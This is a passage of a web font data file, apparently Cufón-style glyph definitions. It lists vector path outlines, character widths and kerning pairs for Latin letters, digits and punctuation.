62r26,0r37,62r-16,0"},{"d":"105,-261v57,-1,98,66,68,119v-26,45,-79,80,-116,117r125,0r0,25r-159,0r0,-25v39,-39,98,-83,127,-126v25,-37,-3,-87,-47,-87v-37,0,-58,28,-55,68r-25,0v-2,-53,32,-90,82,-91","w":203},{"d":"141,-237v-64,3,-101,47,-104,108v-3,59,47,110,106,110v58,0,103,-52,103,-111v0,-56,-49,-108,-105,-107xm141,5v-73,3,-133,-61,-130,-135v4,-78,51,-131,130,-131v80,0,131,53,131,131v0,82,-52,132,-131,135","w":283,"k":{"\u201e":20,"\u201a":20,"\u2019":-10,"\u2018":6,"\u201d":-10,"\u201c":6,"X":10,"T":13,";":6,":":6,".":20,",":20}},{"d":"108,-142v78,21,51,147,-27,147v-43,0,-72,-34,-71,-78r24,0v1,30,18,51,47,52v30,0,49,-20,49,-52v0,-59,-121,-44,-113,-118v-6,-59,74,-93,114,-52v11,12,18,29,19,50r-24,0v-2,-26,-15,-43,-41,-44v-38,-2,-58,52,-28,75v7,5,39,17,51,20xm35,-343r17,0r32,46r32,-46r17,0r-36,61r-26,0","w":167},{"d":"44,28r-26,0r28,-75r25,0","w":101},{"d":"194,-31r-3,-225r25,0r0,256r-31,0r-140,-226r3,226r-25,0r0,-256r30,0","w":240,"k":{"\u2019":-7,"\u201d":-7,";":6,":":6,".":6,",":6}},{"d":"150,-120r85,-84r12,12r-84,85r84,84r-12,13r-85,-85r-84,85r-12,-13r84,-84r-84,-85r12,-12","w":299},{"d":"253,-114r0,14r-207,85r0,-20r180,-72r-180,-73r0,-20","w":299},{"d":"77,41r0,-201r-64,0r0,-22r64,0r0,-74r26,0r0,74r64,0r0,22r-64,0r0,201r-26,0"},{"d":"162,-81v0,-37,-24,-64,-59,-64v-35,0,-62,28,-62,63v0,35,28,65,62,65v35,0,59,-28,59,-64xm101,5v-49,0,-88,-36,-86,-84v3,-58,66,-128,94,-177r31,0r-59,93v59,-18,108,25,108,81v0,49,-40,87,-88,87","w":203},{"d":"108,-142v78,21,51,147,-27,147v-43,0,-72,-34,-71,-78r24,0v1,30,18,51,47,52v30,0,49,-20,49,-52v0,-59,-121,-44,-113,-118v-6,-59,74,-93,114,-52v11,12,18,29,19,50r-24,0v-2,-26,-15,-43,-41,-44v-38,-2,-58,52,-28,75v7,5,39,17,51,20","w":167,"k":{"\u201e":6,"\u201a":6,"\u2019":-10,"\u2018":6,"\u201d":-10,"\u201c":6,";":6,":":6,".":13,"-":-7,",":13}},{"d":"10,-96v0,-77,90,-133,156,-86v16,11,28,27,36,48r-27,0v-14,-25,-32,-41,-67,-41v-41,-1,-72,36,-72,78v0,42,31,80,73,79v33,-1,54,-18,66,-42r27,0v-14,39,-44,64,-92,65v-55,2,-100,-47,-100,-101xm103,-219r-16,0r37,-62r26,0","w":218},{"d":"64,-67r-25,0r0,-189r25,0r0,189xm64,0r-25,0r0,-47r25,0r0,47","w":103},{"d":"143,-133v0,-48,-44,-51,-97,-48r0,97v51,2,97,0,97,-49xm171,-134v0,61,-55,83,-125,76r0,58r-25,0r0,-256r25,0r0,50v73,-6,125,11,125,72","w":181},{"d":"100,-72r0,134r-19,0r0,-134r19,0xm100,-252r0,134r-19,0r0,-134r19,0"},{"d":"255,-116r0,17r-210,0r0,-17r210,0","w":299},{"d":"143,5v-116,8,-173,-149,-92,-229v36,-35,110,-50,159,-18v20,12,36,29,48,52r-30,0v-20,-27,-44,-46,-87,-46v-55,-1,-104,51,-104,107v0,59,46,111,104,110v41,-1,66,-17,85,-44r30,0v-20,39,-59,64,-113,68","w":270,"k":{"\u201e":10,"\u201a":10,"\u2019":-20,"\u2018":6,"\u201d":-20,"\u201c":6,";":6,":":6,".":6,",":6}},{"d":"90,-172r-32,46r-19,-13r35,-44r-52,-15r6,-21r52,17r0,-54r20,0r0,54r50,-17r8,21r-53,15r36,44r-19,13"},{"d":"206,-32v18,114,-151,147,-182,48r29,0v7,22,28,35,56,36v47,0,75,-36,73,-86v-44,74,-173,29,-173,-63v0,-55,44,-102,99,-101v36,0,58,14,74,36r0,-31r24,0r0,161xm109,-175v-41,0,-73,35,-73,77v0,43,31,79,73,79v37,0,73,-37,73,-76v0,-41,-32,-80,-73,-80","w":225,"k":{"\u2039":6,"\u2019":-7,"\u2018":6,"\u201d":-7,"\u201c":6,"\u00ab":6,".":6,",":6}},{"d":"49,0r-26,0r0,-256r26,0r0,256xm42,-281r-47,-62r26,0r37,62r-16,0","w":72},{"d":"141,-237v-64,3,-101,47,-104,108v-3,59,47,110,106,110v58,0,103,-52,103,-111v0,-56,-49,-108,-105,-107xm141,5v-73,3,-133,-61,-130,-135v4,-78,51,-131,130,-131v80,0,131,53,131,131v0,82,-52,132,-131,135xm148,-281r-47,-62r26,0r37,62r-16,0","w":283},{"d":"110,-18v40,0,73,-39,73,-80v0,-39,-35,-77,-72,-77v-41,0,-75,36,-75,80v0,42,34,77,74,77xm10,-96v0,-91,127,-138,173,-66r0,-31r24,0r0,193r-24,0r0,-31v-14,21,-41,36,-74,36v-55,0,-99,-45,-99,-101xm63,-219r36,-62r26,0r36,62r-17,0r-32,-47r-32,47r-17,0","w":226},{"d":"111,-199v60,0,100,48,99,110r-175,0v3,40,32,71,74,71v32,0,55,-20,66,-43r28,0v-15,38,-45,65,-93,66v-55,2,-101,-47,-101,-102v0,-57,44,-102,102,-102xm182,-110v-4,-58,-77,-85,-122,-48v-13,12,-21,28,-24,48r146,0","w":218,"k":{"\u203a":6,"\u2018":26,"\u201c":26,"\u00bb":6,";":6,":":6,".":13,",":13}},{"d":"-1,-143v7,-33,15,-43,54,-44r149,0r-5,21r-32,0r-26,128v-2,21,19,21,36,17v-2,13,-4,26,-22,24v-75,-8,-16,-116,-13,-169r-64,0r-35,166r-24,0r35,-166v-18,-1,-28,7,-30,23r-23,0","w":205},{"d":"-6,-193r29,0r59,157r63,-157r29,0r-105,256r-26,0r26,-63xm103,-231r0,-29r25,0r0,29r-25,0xm38,-231r0,-29r25,0r0,29r-25,0","w":165},{"d":"98,5v-98,6,-77,-107,-79,-198r25,0v5,71,-24,175,55,175v77,0,55,-99,58,-175r24,0r0,193r-24,0r0,-21v-15,17,-30,24,-59,26xm119,-231r0,-29r25,0r0,29r-25,0xm54,-231r0,-29r25,0r0,29r-25,0","w":200},{"d":"82,52r0,20r-59,0r0,-328r59,0r0,21r-34,0r0,287r34,0","w":95},{"d":"143,5v-116,8,-173,-149,-92,-229v36,-35,110,-50,159,-18v20,12,36,29,48,52r-30,0v-20,-27,-44,-46,-87,-46v-55,-1,-104,51,-104,107v0,59,46,111,104,110v41,-1,66,-17,85,-44r30,0v-20,39,-59,64,-113,68xm135,-281r-16,0r37,-62r26,0","w":270},{"d":"141,-237v-64,3,-101,47,-104,108v-3,59,47,110,106,110v58,0,103,-52,103,-111v0,-56,-49,-108,-105,-107xm141,5v-73,3,-133,-61,-130,-135v4,-78,51,-131,130,-131v80,0,131,53,131,131v0,82,-52,132,-131,135xm125,-321v21,0,44,20,53,-4r15,0v-5,36,-42,34,-72,23v-8,1,-13,6,-16,13r-14,0v4,-18,14,-32,34,-32","w":283},{"d":"45,-237r0,-20r90,0r0,20r-90,0"},{"d":"0,-86r0,-20r360,0r0,20r-360,0","w":360},{"d":"51,-112v-9,0,-16,-7,-16,-16v0,-10,7,-17,16,-17v21,0,20,33,0,33","w":101},{"d":"41,-219r36,-62r26,0r36,62r-17,0r-32,-47r-32,47r-17,0"},{"d":"117,5v-34,0,-59,-14,-73,-36r0,94r-25,0r0,-256r25,0r0,31v45,-70,173,-26,173,66v0,55,-45,102,-100,101xm116,-175v-37,0,-72,38,-72,77v0,42,33,80,73,80v40,0,74,-36,74,-77v0,-44,-34,-80,-75,-80","w":226,"k":{"\u203a":6,"\u2018":26,"\u201c":26,"\u00bb":6,";":6,":":6,".":13,",":13}},{"d":"108,-142v78,21,51,147,-27,147v-43,0,-72,-34,-71,-78r24,0v1,30,18,51,47,52v30,0,49,-20,49,-52v0,-59,-121,-44,-113,-118v-6,-59,74,-93,114,-52v11,12,18,29,19,50r-24,0v-2,-26,-15,-43,-41,-44v-38,-2,-58,52,-28,75v7,5,39,17,51,20xm106,50v1,-17,-14,-19,-33,-18r0,-32r11,0r0,20v25,-1,42,7,42,30v1,39,-54,33,-84,24r0,-14v23,4,62,16,64,-10","w":167},{"d":"110,-231r0,-29r25,0r0,29r-25,0xm45,-231r0,-29r25,0r0,29r-25,0"},{"d":"137,0r-133,0r0,-23r100,-147r-89,0r0,-23r117,0r0,26r-99,142r104,0r0,25xm24,-281r17,0r32,46r32,-46r17,0r-36,61r-26,0","w":145},{"d":"100,-219r30,-62r23,0r-40,62r-13,0xm59,-219r26,-62r24,0r-37,62r-13,0"},{"d":"29,-181r-25,0r27,-75r26,0","w":69},{"d":"158,-256r52,210r64,-210r24,0r-79,256r-21,0r-51,-209r-52,209r-21,0r-79,-256r25,0r63,210r52,-210r23,0","w":292,"k":{"\u201e":26,"\u201a":26,"\u203a":20,"\u2039":26,"\u2019":-20,"\u2018":-20,"\u201d":-20,"\u201c":-20,"\u0153":13,"\u00bb":20,"\u00ab":26,"\u00f8":13,"\u00e6":13,"u":10,"r":6,"o":13,"e":13,"a":13,";":6,":":6,".":26,"-":20,",":26}},{"d":"111,5v-57,0,-89,-34,-87,-99r-25,0r5,-19r20,0r0,-30r-24,0r5,-19r19,0v-12,-91,90,-125,147,-77v17,14,25,32,26,50r-26,0v-5,-30,-27,-50,-60,-50v-42,0,-65,31,-62,77r113,0r-5,19r-108,0r0,30r104,0r-4,19r-100,0v-3,46,20,77,62,77v34,0,53,-18,59,-47r26,0v-6,44,-39,69,-85,69","w":203},{"d":"66,-181r-25,0r-27,-75r24,0","w":69,"k":{"\u00d0":-7,"\u0142":-13,"\u0141":-7,"\uf002":-20,"\uf001":-20,"\u0152":-10,"\u00d8":-10,"\u00c6":33,"\u00df":-13,"\u00c5":20,"z":-13,"y":-27,"x":-13,"w":-20,"v":-20,"u":-13,"t":-20,"s":-7,"r":-13,"p":-13,"n":-13,"m":-13,"l":-13,"k":-13,"j":-13,"i":-13,"h":-13,"f":-20,"b":-13,"Z":-7,"Y":-17,"X":-7,"W":-20,"V":-20,"U":-7,"T":-7,"S":-10,"R":-7,"Q":-17,"P":-7,"O":-10,"N":-7,"M":-7,"L":-7,"K":-7,"J":46,"I":-7,"H":-7,"G":-10,"F":-7,"E":-7,"D":-7,"C":-10,"B":-7,"A":20}},{"d":"49,0r-26,0r0,-256r26,0r0,256xm-13,-281r36,-62r26,0r36,62r-17,0r-32,-47r-32,47r-17,0","w":72},{"d":"90,-285v-14,0,-26,11,-26,27v0,14,11,26,26,26v14,0,26,-12,26,-26v0,-15,-12,-27,-26,-27xm90,-216v-23,1,-43,-19,-42,-42v0,-24,19,-43,42,-43v23,0,43,20,43,43v0,23,-20,42,-43,42"},{"d":"111,-199v60,0,100,48,99,110r-175,0v3,40,32,71,74,71v32,0,55,-20,66,-43r28,0v-15,38,-45,65,-93,66v-55,2,-101,-47,-101,-102v0,-57,44,-102,102,-102xm182,-110v-4,-58,-77,-85,-122,-48v-13,12,-21,28,-24,48r146,0xm131,-231r0,-29r25,0r0,29r-25,0xm66,-231r0,-29r25,0r0,29r-25,0","w":218},{"d":"102,-80v-7,-70,90,-134,126,-67r11,-22r16,0r-27,115v0,10,7,17,19,16v50,-4,72,-48,73,-100v2,-63,-59,-104,-125,-102v-94,3,-149,58,-154,150v-7,128,167,153,250,91r7,10v-31,22,-67,39,-115,39v-97,0,-162,-49,-162,-144v0,-100,71,-162,175,-162v81,0,143,40,143,119v0,66,-33,115,-97,115v-22,0,-37,-10,-33,-32v-10,18,-26,31,-52,32v-37,0,-52,-21,-55,-58xm123,-78v0,41,44,51,70,29v20,-17,23,-49,31,-77v-4,-19,-17,-35,-38,-35v-38,0,-63,41,-63,83","w":360},{"d":"68,-160v-33,8,-28,57,1,68r43,27v31,-15,25,-53,-5,-71xm88,38v-37,0,-60,-22,-58,-60v7,1,20,-3,24,2v0,23,12,35,34,37v27,2,41,-27,26,-48v-24,-32,-95,-39,-95,-91v0,-28,15,-40,35,-52v-37,-24,-13,-91,37,-87v34,3,57,23,55,59r-23,0v0,-23,-12,-38,-34,-38v-25,0,-38,29,-23,47v26,33,93,37,94,93v0,25,-15,39,-34,49v37,27,15,89,-38,89"},{"d":"255,-83r0,17r-210,0r0,-17r210,0xm255,-149r0,18r-210,0r0,-18r210,0","w":299},{"d":"69,-259v36,0,67,39,45,72v-18,27,-53,48,-77,70r83,0r0,15r-105,0r0,-15v28,-31,77,-49,89,-94v1,-20,-15,-35,-36,-34v-23,0,-39,15,-36,41r-17,0v-2,-33,22,-55,54,-55","w":134},{"d":"80,5v-74,0,-96,-102,-39,-138v17,-16,26,-27,27,-53r25,0v3,53,-56,71,-58,116v-1,29,17,50,46,49v33,0,47,-24,49,-57r26,0v1,48,-30,83,-76,83xm93,-256r0,47r-25,0r0,-47r25,0","w":166},{"d":"23,0r0,-113r-23,16r0,-25r23,-16r0,-118r25,0r0,101r24,-16r0,25r-24,16r0,130r-25,0","w":68,"k":{"\u2039":6,"\u2019":-13,"\u201d":-13,"\u00ab":6,".":6,",":6}},{"d":"142,0r-116,0r0,-101r-26,19r0,-26r26,-18r0,-130r26,0r0,113r45,-32r0,26r-45,31r0,93r90,0r0,25","w":150,"k":{"\u201e":-7,"\u201a":-7,"\u203a":20,"\u2039":33,"\u2019":40,"\u2018":40,"\u201d":40,"\u201c":40,"\u00bb":20,"\u00ab":33,"y":20,"u":11,"o":11,"e":11,"a":11,"Y":20,"W":21,"V":33,"U":6,"T":15,"O":13,";":6,":":6,".":13,"-":26,",":13}},{"d":"182,-78v0,72,-93,110,-141,61v-15,-15,-22,-35,-22,-61v8,1,22,-3,26,2v-1,33,23,59,54,59v34,0,58,-25,58,-59v0,-45,-33,-64,-79,-59r0,-22v35,4,62,-7,61,-41v0,-22,-16,-41,-38,-41v-27,-1,-40,18,-41,43r-23,0v1,-38,27,-65,65,-65v57,0,87,83,38,111v26,13,42,35,42,72","w":203},{"d":"126,-231r-112,0r0,-25r142,0r0,24r-120,207r122,0r0,25r-151,0r0,-24xm33,-343r17,0r32,46r32,-46r17,0r-36,61r-26,0","w":164},{"d":"141,-261v48,0,83,21,104,51r0,-46r133,0r0,25r-108,0r0,90r108,0r0,25r-108,0r0,91r108,0r0,25r-133,0r0,-46v-26,31,-54,50,-104,51v-73,2,-133,-61,-130,-135v4,-78,51,-131,130,-131xm141,-237v-64,3,-101,47,-104,108v-3,59,47,110,106,110v58,0,103,-52,103,-111v0,-56,-49,-108,-105,-107","w":392,"k":{"\u203a":6,"\u2039":6,"\u00bb":6,"\u00ab":6,";":13,":":13,".":6,"-":6,",":6}},{"d":"103,5v-120,0,-74,-155,-83,-261r25,0r0,162v-3,49,18,76,57,76v90,0,46,-152,56,-238r25,0v-8,105,34,261,-80,261xm53,-281r36,-62r26,0r36,62r-17,0r-32,-47r-32,47r-17,0","w":203},{"d":"183,-93v0,-39,-33,-72,-75,-72v-39,0,-72,34,-72,74v0,41,33,74,74,73v41,0,74,-33,73,-75xm9,-90v0,-77,104,-126,164,-71v-8,-23,-23,-40,-40,-54r-47,17r-7,-14r39,-15r-28,-15r8,-16v17,7,30,14,43,23r51,-18r6,14r-42,15v30,29,52,67,53,120v2,62,-41,109,-100,109v-54,0,-100,-44,-100,-95","w":218},{"d":"202,-129v-3,-65,-33,-105,-107,-103r-46,0r0,208v92,8,157,-18,153,-105xm229,-128v0,85,-47,132,-144,128r-61,0r0,-256r73,0v87,-2,132,49,132,128","w":240,"k":{"\u201e":20,"\u201a":20,"\u2019":-10,"\u2018":6,"\u201d":-10,"\u201c":6,";":6,":":6,".":20,"-":-7,",":20}},{"d":"70,-20v40,0,43,-25,43,-74r0,-162r25,0r0,173v12,76,-68,112,-116,70v-13,-11,-17,-29,-17,-49r25,0v1,24,17,42,40,42","w":160,"k":{"\u201e":10,"\u201a":10,"\u2019":-7,"\u201d":-7,";":6,":":6,".":13,",":13}},{"d":"59,-170v19,0,37,-17,37,-36v0,-20,-17,-37,-37,-37v-20,0,-36,17,-36,37v0,20,17,36,36,36xm10,-206v-1,-27,23,-49,49,-49v27,0,49,23,49,49v0,26,-24,50,-49,49v-27,-1,-49,-21,-49,-49","w":118},{"d":"126,-231r-112,0r0,-25r142,0r0,24r-120,207r122,0r0,25r-151,0r0,-24","w":164,"k":{"\u201e":-13,"\u201a":-13,"\u203a":13,"\u2039":33,"\u2019":-10,"\u201d":-10,"\u00bb":13,"\u00ab":33,".":13,"-":26,",":13}},{"d":"180,-106r0,20r-180,0r0,-20r180,0"},{"d":"103,5v-120,0,-74,-155,-83,-261r25,0r0,162v-3,49,18,76,57,76v90,0,46,-152,56,-238r25,0v-8,105,34,261,-80,261xm96,-281r-16,0r37,-62r26,0","w":203},{"d":"88,33r-88,-289r21,0r88,289r-21,0","w":100},{"d":"49,0r-26,0r0,-256r26,0r0,256","w":72,"k":{"\u2019":-7,"\u201d":-7,";":6,":":6,".":6,",":6}},{"d":"103,5v-120,0,-74,-155,-83,-261r25,0r0,162v-3,49,18,76,57,76v90,0,46,-152,56,-238r25,0v-8,105,34,261,-80,261","w":203,"k":{"\u201e":6,"\u201a":6,"\u203a":10,"\u2039":6,"\u2019":-7,"\u201d":-7,"\u00bb":10,"\u00ab":6,".":13,",":13}},{"d":"37,-129v0,85,101,145,169,87v19,-15,30,-34,36,-58r-129,0r0,-23r159,0v-2,71,-59,128,-131,128v-73,0,-130,-61,-130,-135v0,-102,109,-163,200,-113v20,11,35,29,47,51r-31,0v-20,-26,-43,-44,-84,-45v-57,-1,-106,50,-106,108","w":283,"k":{"\u201e":20,"\u201a":20,"\u2019":-8,"\u2018":6,"\u201d":-8,"\u201c":6,";":6,":":6,".":13,",":13}},{"d":"78,0r-25,0r0,-231r-51,0r0,-25r128,0r0,25r-52,0r0,231","w":131,"k":{"\u201e":13,"\u201a":13,"\u203a":20,"\u2039":26,"\u2019":-7,"\u2018":-13,"\u201d":-7,"\u201c":-13,"\u0153":15,"\u0152":13,"\u00bb":20,"\u00ab":26,"\u00f8":15,"\u00e6":15,"\u00d8":13,"\u00c5":13,"y":6,"w":8,"u":8,"s":11,"r":8,"o":15,"e":15,"c":15,"a":15,"O":13,"C":13,"A":13,";":13,":":13,".":26,"-":20,",":26}},{"d":"107,-176v-40,0,-72,38,-72,79v0,42,33,79,75,79v42,0,73,-37,73,-79v0,-44,-32,-79,-76,-79xm110,5v-55,0,-101,-47,-101,-102v0,-54,46,-103,99,-103v54,0,101,48,101,101v0,56,-44,104,-99,104","w":218,"k":{"\u203a":6,"\u2018":26,"\u201c":26,"\u00bb":6,";":6,":":6,".":13,",":13}},{"d":"30,-260v71,-9,70,42,68,108v-1,38,14,50,52,49r0,19v-56,-8,-52,40,-52,92v0,54,-15,66,-68,65r0,-19v90,19,6,-138,81,-147v-42,-6,-34,-54,-35,-103v0,-38,-10,-46,-46,-45r0,-19"},{"d":"89,-248r-68,144r68,145r68,-145xm89,-291r88,187r-88,188r-88,-188","w":177},{"d":"109,75v-64,11,-57,-58,-18,-75r11,0v-14,11,-24,24,-26,41v-2,16,16,17,33,16r0,18"},{"d":"111,-18v37,1,72,-38,72,-77v0,-41,-34,-80,-73,-80v-39,0,-74,36,-74,77v0,44,34,80,75,80xm109,-198v33,0,59,15,75,35r-2,-47r-51,0r0,-19r51,0r0,-27r25,0r0,27r27,0r0,19r-27,0r0,210r-24,0r0,-29v-16,19,-42,33,-74,34v-55,2,-99,-47,-99,-102v0,-56,45,-101,99,-101","w":229,"k":{"\u2039":6,"\u2019":-13,"\u201d":-13,"\u00ab":6,".":6,",":6}},{"d":"25,0r0,-256r37,0r89,223r88,-223r37,0r0,256r-24,0r0,-226r-90,226r-23,0r-90,-226r0,226r-24,0","w":297,"k":{"\u2019":-7,"\u201d":-7,";":6,":":6,".":6,",":6}},{"d":"98,-94r0,94r-25,0r0,-94r-82,-162r29,0r66,133r66,-133r28,0","w":172,"k":{"\u201e":26,"\u201a":26,"\u203a":26,"\u2039":40,"\u2019":-17,"\u2018":-20,"\u201d":-17,"\u201c":-20,"\u0153":24,"\u00bb":26,"\u00ab":40,"\u00f8":24,"\u00e6":24,"\u00c5":13,"u":18,"o":24,"e":24,"a":24,"A":13,";":13,":":13,".":40,"-":20,",":40}},{"d":"88,-169v-69,2,-35,106,-43,169r-25,0r0,-193r23,0r0,22v11,-15,22,-24,45,-25r0,27","w":90,"k":{"\uf002":-13,"\uf001":-13,"\u203a":6,"\u2039":20,"\u2019":-27,"\u201d":-27,"\u00bb":6,"\u00ab":20,"z":-7,"y":-20,"x":-13,"w":-13,"v":-13,"f":-13,".":26,"-":6,",":26}},{"d":"274,-40r1,-87r-60,87r59,0xm289,0r-15,0r0,-28r-76,0r0,-12r73,-103r18,0r0,103r18,0r0,12r-18,0r0,28xm89,5r-21,0r159,-266r21,0xm75,-113r-17,0r0,-131r-28,0r0,-12r45,0r0,143","w":316},{"d":"103,-237v-28,-2,-45,34,-29,58v4,7,13,15,24,24v42,-7,55,-79,5,-82xm88,-128v-52,13,-52,111,11,108v30,-1,42,-21,57,-45xm163,-201v-1,32,-22,51,-49,62r52,48r31,-79r27,0r-39,97r58,53r-16,19r-52,-48v-14,30,-38,53,-78,54v-41,2,-75,-37,-74,-77v0,-34,22,-61,48,-73v-49,-29,-30,-116,33,-116v31,0,61,29,59,60","w":249},{"d":"24,0r0,-256r126,0r0,25r-101,0r0,90r101,0r0,25r-101,0r0,116r-25,0","w":174,"k":{"\u201e":43,"\u201a":43,"\u203a":13,"\u2039":13,"\u0153":8,"\u00bb":13,"\u00ab":13,"\u00f8":8,"\u00e6":8,"\u00c5":16,"y":8,"u":6,"r":6,"o":8,"i":6,"e":8,"a":8,"S":13,"A":16,";":20,":":20,".":46,"-":10,",":46}},{"d":"35,-252r0,97r-18,0r0,-97r18,0","w":51},{"d":"83,-118v17,25,21,71,2,96v55,8,98,-14,82,-71r25,0v9,58,-19,93,-80,93r-91,0r0,-22r39,0v23,-25,16,-71,-4,-96r-44,0r0,-25r25,0v-36,-79,59,-155,125,-100v14,11,23,28,27,49r-23,0v-6,-26,-23,-44,-54,-44v-49,0,-71,57,-47,95r86,0r0,25r-68,0","w":203},{"d":"141,-237v-64,3,-101,47,-104,108v-3,59,47,110,106,110v58,0,103,-52,103,-111v0,-56,-49,-108,-105,-107xm141,5v-73,3,-133,-61,-130,-135v4,-78,51,-131,130,-131v80,0,131,53,131,131v0,82,-52,132,-131,135xm136,-281r-16,0r37,-62r26,0","w":283},{"d":"192,-256r93,98r-25,0r-80,-80r-81,80r-25,0r94,-98r24,0","w":360},{"d":"141,-237v-64,3,-101,47,-104,108v-3,59,47,110,106,110v58,0,103,-52,103,-111v0,-56,-49,-108,-105,-107xm141,5v-73,3,-133,-61,-130,-135v4,-78,51,-131,130,-131v80,0,131,53,131,131v0,82,-52,132,-131,135xm93,-281r36,-62r26,0r36,62r-17,0r-32,-47r-32,47r-17,0","w":283},{"d":"48,-79r0,79r-25,0r0,-256r25,0r0,142r119,-142r30,0r-104,124r102,132r-31,0r-87,-113","w":193,"k":{"\u201e":-13,"\u201a":-13,"\u203a":20,"\u2039":33,"\u2019":-7,"\u2018":-7,"\u201d":-7,"\u201c":-7,"\u0153":13,"\u0152":16,"\u00bb":20,"\u00ab":33,"\u00f8":13,"\u00e6":13,"\u00d8":16,"y":13,"u":10,"o":13,"e":13,"a":13,"Y":6,"W":6,"O":16,"C":16,";":6,":":6,".":6,"-":20,",":6}},{"d":"-6,-193r29,0r59,157r63,-157r29,0r-105,256r-26,0r26,-63","w":165,"k":{"\u203a":6,"\u2039":13,"\u2019":-27,"\u2018":-7,"\u201d":-27,"\u201c":-7,"\u00bb":6,"\u00ab":13,".":33,"-":6,",":33}},{"d":"49,-141r108,0r0,25r-108,0r0,91r108,0r0,25r-133,0r0,-256r133,0r0,25r-108,0r0,90xm99,-281r-47,-62r26,0r37,62r-16,0"},{"d":"13,52r34,0r0,-287r-34,0r0,-21r59,0r0,328r-59,0r0,-20","w":95},{"d":"274,-40r1,-87r-60,87r59,0xm289,0r-15,0r0,-28r-76,0r0,-12r73,-103r18,0r0,103r18,0r0,12r-18,0r0,28xm89,5r-21,0r159,-266r21,0xm89,-197v45,17,26,87,-26,87v-31,0,-51,-16,-51,-46v5,1,13,-2,16,1v-1,19,16,33,35,33v21,0,36,-13,36,-33v-1,-26,-21,-36,-50,-34r0,-12v20,4,39,-3,39,-23v0,-14,-12,-23,-24,-23v-15,0,-26,8,-26,24r-15,0v0,-46,81,-47,81,-1v-1,14,-6,20,-15,27","w":316},{"d":"63,0r-25,0r0,-47r25,0r0,47","w":101},{"d":"141,-237v-64,3,-101,47,-104,108v-3,59,47,110,106,110v58,0,103,-52,103,-111v0,-56,-49,-108,-105,-107xm141,5v-73,3,-133,-61,-130,-135v4,-78,51,-131,130,-131v80,0,131,53,131,131v0,82,-52,132,-131,135xm162,-293r0,-29r25,0r0,29r-25,0xm97,-293r0,-29r25,0r0,29r-25,0","w":283},{"d":"202,-216v-76,-61,-199,24,-157,129v5,13,12,25,21,34xm82,-39v80,58,197,-25,157,-129v-5,-12,-12,-24,-22,-34xm272,-130v6,103,-123,175,-206,110r-36,44r-17,-14r37,-43v-23,-25,-39,-55,-39,-97v0,-78,52,-131,132,-131v32,0,55,9,75,25r30,-36r17,13r-31,37v24,23,36,50,38,92","w":283,"k":{"\u201e":20,"\u201a":20,"\u2019":-10,"\u2018":6,"\u201d":-10,"\u201c":6,"X":10,"T":13,";":6,":":6,".":20,",":20}},{"d":"13,33r-22,0r88,-289r21,0","w":100},{"d":"10,-96v0,-77,90,-133,156,-86v16,11,28,27,36,48r-27,0v-14,-25,-32,-41,-67,-41v-41,-1,-72,36,-72,78v0,42,31,80,73,79v33,-1,54,-18,66,-42r27,0v-14,39,-44,64,-92,65v-55,2,-100,-47,-100,-101","w":218,"k":{"\u203a":6,"\u2039":6,"\u2018":26,"\u201c":26,"\u00bb":6,"\u00ab":6,";":6,":":6,".":13,",":13}},{"d":"159,-215r0,99r96,0r0,17r-96,0r0,99r-17,0r0,-99r-97,0r0,-17r97,0r0,-99r17,0","w":299},{"d":"102,-173v-79,0,-54,99,-58,173r-24,0r0,-256r24,0r0,85v13,-17,32,-24,59,-26v96,-5,76,107,78,197r-24,0v-5,-71,23,-173,-55,-173","w":200,"k":{"\u2039":6,"\u2018":20,"\u201c":20,"\u00ab":6,".":6,",":6}},{"d":"143,5v-116,8,-173,-149,-92,-229v36,-35,110,-50,159,-18v20,12,36,29,48,52r-30,0v-20,-27,-44,-46,-87,-46v-55,-1,-104,51,-104,107v0,59,46,111,104,110v41,-1,66,-17,85,-44r30,0v-20,39,-59,64,-113,68xm163,50v1,-17,-14,-19,-33,-18r0,-32r11,0r0,20v25,-1,42,7,42,30v1,39,-54,33,-84,24r0,-14v23,4,62,16,64,-10","w":270},{"d":"10,-96v0,-77,90,-133,156,-86v16,11,28,27,36,48r-27,0v-14,-25,-32,-41,-67,-41v-41,-1,-72,36,-72,78v0,42,31,80,73,79v33,-1,54,-18,66,-42r27,0v-14,39,-44,64,-92,65v-55,2,-100,-47,-100,-101xm60,-281r17,0r32,46r32,-46r17,0r-36,61r-26,0","w":218},{"d":"49,-141r108,0r0,25r-108,0r0,91r108,0r0,25r-133,0r0,-256r133,0r0,25r-108,0r0,90xm113,-293r0,-29r25,0r0,29r-25,0xm48,-293r0,-29r25,0r0,29r-25,0"},{"d":"49,0r-26,0r0,-256r26,0r0,256xm56,-293r0,-29r25,0r0,29r-25,0xm-9,-293r0,-29r25,0r0,29r-25,0","w":72},{"d":"102,-238v-25,0,-45,17,-45,41v0,25,17,42,43,42v30,0,47,-13,48,-42v0,-24,-20,-41,-46,-41xm102,-131v-35,0,-56,23,-57,58v-1,31,25,56,55,56v33,0,58,-25,58,-58v0,-33,-22,-56,-56,-56xm20,-76v1,-36,15,-50,39,-67v-54,-29,-20,-124,42,-118v64,-8,98,88,43,118v70,30,40,148,-44,148v-42,0,-82,-37,-80,-81","w":203},{"d":"76,78v-69,-27,-53,-137,-54,-232v0,-54,18,-88,54,-107r0,28v-46,29,-29,127,-29,199v0,45,5,64,29,83r0,29","w":95},{"d":"150,-166r32,0r0,19r-43,0r-15,30r58,0r0,19r-68,0r0,98r-25,0r0,-98r-69,0r0,-19r59,0r-15,-30r-44,0r0,-19r33,0r-45,-88r28,0r66,131r65,-131r28,0","w":203},{"d":"78,-237v-21,0,-40,18,-40,39v0,21,18,40,40,40v22,0,40,-18,40,-40v0,-22,-18,-39,-40,-39xm79,-135v-35,0,-63,-28,-63,-63v0,-35,28,-63,63,-63v34,0,63,29,63,63v0,35,-28,63,-63,63xm216,-261r21,0r-137,266r-21,0xm236,-98v-21,0,-40,18,-40,40v0,21,19,40,40,40v21,0,40,-19,40,-40v0,-21,-19,-40,-40,-40xm237,5v-35,0,-64,-28,-64,-63v0,-34,29,-63,64,-63v34,0,63,30,63,63v0,34,-28,63,-63,63","w":315},{"d":"156,-185v0,50,-61,64,-60,115r-25,0v-3,-53,59,-71,59,-116v0,-29,-18,-50,-47,-49v-33,0,-47,24,-49,57r-26,0v-1,-48,30,-83,77,-83v43,-1,71,33,71,76xm71,0r0,-47r25,0r0,47r-25,0","w":166},{"d":"111,-18v37,1,72,-38,72,-77v0,-41,-34,-80,-73,-80v-39,0,-74,36,-74,77v0,44,34,80,75,80xm109,-198v34,0,57,14,73,35r0,-93r25,0r0,256r-25,0r0,-29v-15,20,-41,34,-73,34v-55,2,-99,-47,-99,-102v0,-56,45,-101,99,-101","w":226,"k":{"\u